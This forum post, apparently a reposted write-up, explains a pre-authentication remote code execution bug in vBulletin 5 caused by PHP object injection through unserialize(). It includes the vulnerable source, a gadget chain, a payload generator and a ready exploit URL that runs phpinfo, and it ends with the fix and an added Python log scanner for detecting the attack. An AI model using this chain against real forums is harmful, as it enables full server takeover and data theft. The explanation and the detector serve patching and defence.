HackerTop - View topic - vBulletin 5 PreAuth RCE Exploit
 vBulletin 5 PreAuth RCE Exploit 
Site Admin
Joined: Sun Jul 24, 2016 6:44 am
Posts: 18
by @_cutz


It came to my attention that a guy named Coldzer0 is selling a vBulletin RCE exploit on http://0day.today.
In his video he exploited several vBulletin boards while surfing on Google... This ended in the vBulletin main forum being pwned on Monday (11/02/15).

vBulletin implements certain ajax API calls in /core/vb/api/, one of them is hook.php:
Code:
   public function decodeArguments($arguments)
   {
      if ($args = @unserialize($arguments))
      {
         $result = '';

         foreach ($args AS $varname => $value)
         {
            $result .= $varname;

Apart from the obvious unserialize() not much else is happening there -- luckily we have in /core/vb/db/result.php:
Code:
class vB_dB_Result implements Iterator
{
...
   public function rewind()
   {
      //no need to rerun the query if we are at the beginning of the recordset.
      if ($this->bof)
      {
         return;
      }

      if ($this->recordset)
      {
         $this->db->free_result($this->recordset);
      }

rewind() is the first function to get called when an Iterator object is accessed via foreach(). Then we have in /core/vb/database.php:
Code:
abstract class vB_Database
{
...   
   function free_result($queryresult)
   {
      $this->sql = '';
      return @$this->functions['free_result']($queryresult);
   }

Which gives easy RCE. Set up the objects accordingly:

Code:
$ php << 'eof'
<?php
class vB_Database {
       public $functions = array();

       public function __construct()
       {
               $this->functions['free_result'] = 'phpinfo';
       }
}

class vB_dB_Result {
       protected $db;
       protected $recordset;

       public function __construct()
       {
               $this->db = new vB_Database();
               $this->recordset = 1;
       }
}
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D

Just surf to:
Code:
http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D

The fix was just replacing the unserialize() with json_decode(). Btw this bug has been sitting in vBulletin for more than three years.


Sun Jul 24, 2016 9:28 am
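As an added defender-side example (not from the post and not vBulletin's own code), here is a Python scan over constructed access-log lines that flags requests handing the hook/decodeArguments endpoint a serialized PHP object, where the endpoint's foreach() only expects a serialized array. The log format, addresses and the benign traffic are assumptions; the flagged payload is the one quoted in the post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Common Log Format). Line 2 carries the
# payload quoted in the post; the others are made-up benign traffic, including
# a legitimate serialized *array* sent to the same endpoint.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Feb/2015:10:01:02 +0000] "GET /vbforum/forum HTTP/1.1" 200 5123
10.0.0.7 - - [11/Feb/2015:10:01:05 +0000] "GET /vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D HTTP/1.1" 200 8812
10.0.0.9 - - [11/Feb/2015:10:01:09 +0000] "GET /vbforum/ajax/api/hook/decodeArguments?arguments=a%3A1%3A%7Bs%3A3%3A%22foo%22%3Bs%3A3%3A%22bar%22%3B%7D HTTP/1.1" 200 120
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)
# A PHP serialized object starts with O:<name length>:"<class>":<prop count>:{
# whereas a hook argument list is a serialized array (a:...), never an object.
PHP_OBJECT = re.compile(r'O:\d+:"([^"]+)":\d+:\{')
VULN_PATH = '/ajax/api/hook/decodeArguments'

def php_object_classes(serialized: str) -> list:
    """Every class name a PHP unserialize() of this string would instantiate."""
    return PHP_OBJECT.findall(serialized)

def scan_access_log(text: str) -> list:
    """Flag GET requests that hand decodeArguments a serialized PHP object.
    POST bodies are not in an access log; those need a WAF or application hook."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        url = urlsplit(m['target'])
        if not url.path.endswith(VULN_PATH):
            continue
        # parse_qs percent-decodes, so %00%2a%00db becomes "\0*\0db", the
        # mangled name PHP uses for the protected property $db.
        for arg in parse_qs(url.query).get('arguments', []):
            classes = php_object_classes(arg)
            if classes:
                findings.append({'ip': m['ip'], 'time': m['ts'], 'gadgets': classes})
    return findings

if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} object injection via {' -> '.join(hit['gadgets'])}")
```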
Copyright © 2003-2016 HackerTop. All rights reserved.